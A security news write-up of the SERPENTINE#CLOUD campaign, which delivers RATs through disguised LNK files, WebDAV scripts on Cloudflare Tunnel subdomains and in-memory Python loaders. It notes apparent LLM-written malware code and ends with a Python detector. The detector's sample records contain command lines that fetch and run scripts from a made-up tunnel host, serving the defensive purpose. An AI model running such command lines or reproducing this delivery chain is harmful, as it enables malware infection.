A batch file whispered to a script, a shortcut disguised itself as a document, and Cloudflare saw nothing suspicious.
A new malicious campaign, dubbed SERPENTINE#CLOUD, is leveraging Cloudflare Tunnel subdomains to deliver malware via phishing email attachments. The multi-stage attack was uncovered by Securonix, with activity observed across the U.S., UK, Germany, and several countries in Europe and Asia.
Stage 1: Phishing & Deception
The attack begins with mass phishing emails — typically themed around invoices or payment notices. Attached is a ZIP archive containing a Windows LNK shortcut, cleverly disguised as a PDF document. Once opened, this shortcut triggers a script download from a WebDAV server hosted on a Cloudflare Tunnel subdomain. This abuse of a trusted cloud service enables stealthy delivery by bypassing domain filtering protections.
Stage 2: Script Execution
The downloaded WSF (Windows Script File) is written in VBScript and executed via cscript.exe. It fetches and runs an external batch file (kiki.bat), again from a Cloudflare subdomain. To mislead the user, a fake PDF opens, while in the background:
- The batch script performs AV checks
- The batch script downloads a Python-based loader for the next payload
Stage 3: Memory Injection
In the final stage, a Python loader is used to inject shellcode into memory. This code is packed using Donut, a known open-source tool for in-memory injection. Identified payloads include:
- AsyncRAT
- Revenge RAT
- GuLoader
- Remcos
- XWorm
- Venom RAT
- PureLogs Stealer
Obfuscation Tactics
Researchers highlight a shift in initial infection vectors: older campaigns used .URL files, whereas the current campaign prefers LNK files disguised as documents. These shortcuts trigger the download over WebDAV from subdomains such as *.trycloudflare[.]com, making the traffic appear legitimate and encrypted.
Also notable: both batch and VBScript files include detailed code comments, suggesting potential use of language models (LLMs) to generate the malware logic — a hint at AI-assisted development.
Key Threat Features
- Social engineering + living-off-the-land binaries (LOLBins)
- Stealth execution entirely in RAM
- Cloudflare Tunnel as C2 replacement for stealthy command delivery
- No traditional indicators: no dropped executables, no obvious domains
Active & Evolving Threat
Securonix warns that SERPENTINE#CLOUD is ongoing, with potential for expansion and adaptation. The operators demonstrate a strong command of English, but their identity remains unknown.
Organizations are advised to monitor Cloudflare Tunnel traffic, inspect LNK files carefully, and enhance defenses around script-based and memory-resident threats.
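Turning that advice into a concrete check, as an added example that is not from Securonix or the original report: the Python below scans constructed, simplified process-creation records (image|parent|command line, not real Sysmon or EDR output) for a script host launched with a trycloudflare.com WebDAV or URL path, for python.exe spawned by a script host, and for a shortcut whose name carries a document extension before .lnk. The hostnames, paths and the double-extension heuristic are assumptions, not values from the report.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample records in the form "image|parent|command line".
# The trycloudflare hostname and local paths are made up for this example.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cscript.exe|explorer.exe|cscript.exe //nologo \\abc-def-ghi.trycloudflare.com@SSL\DavWWWRoot\docs\invoice.wsf",
    r"C:\Windows\System32\cmd.exe|cscript.exe|cmd.exe /c \\abc-def-ghi.trycloudflare.com@SSL\DavWWWRoot\kiki.bat",
    r"C:\Users\alice\AppData\Local\Programs\Python\python.exe|cmd.exe|python.exe C:\Users\alice\AppData\Local\Temp\loader.py",
    r"C:\Windows\System32\cscript.exe|explorer.exe|cscript.exe C:\Scripts\backup.wsf",
    r"C:\Program Files\Adobe\Acrobat\Acrobat.exe|explorer.exe|Acrobat.exe C:\Users\alice\Downloads\invoice.pdf",
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}

# Matches a quick-tunnel host either as a URL or as a WebDAV UNC host
# (Windows maps \\host@SSL\DavWWWRoot\... onto HTTPS WebDAV).
TUNNEL_HOST = re.compile(r"(?:https?://|\\\\)[\w.-]+\.trycloudflare\.com", re.IGNORECASE)

@dataclass
class Finding:
    rule: str
    image: str
    detail: str

def analyze_event(line: str) -> List[Finding]:
    """Apply the two process-chain rules to one record."""
    image, parent, cmdline = line.split("|", 2)
    exe = image.rsplit("\\", 1)[-1].lower()
    findings = []
    match = TUNNEL_HOST.search(cmdline)
    if match and exe in SCRIPT_HOSTS:
        findings.append(Finding("script_host_from_tunnel", exe, match.group(0)))
    if exe == "python.exe" and parent.lower() in SCRIPT_HOSTS:
        findings.append(Finding("python_spawned_by_script_host", exe, parent))
    return findings

def analyze_events(lines: Iterable[str]) -> List[Finding]:
    return [f for line in lines for f in analyze_event(line)]

def is_disguised_lnk(filename: str) -> bool:
    """Heuristic (assumption): a document extension immediately before .lnk."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    return any(name[:-4].endswith(ext) for ext in DOC_EXTS)

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.image} ({f.detail})")
```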
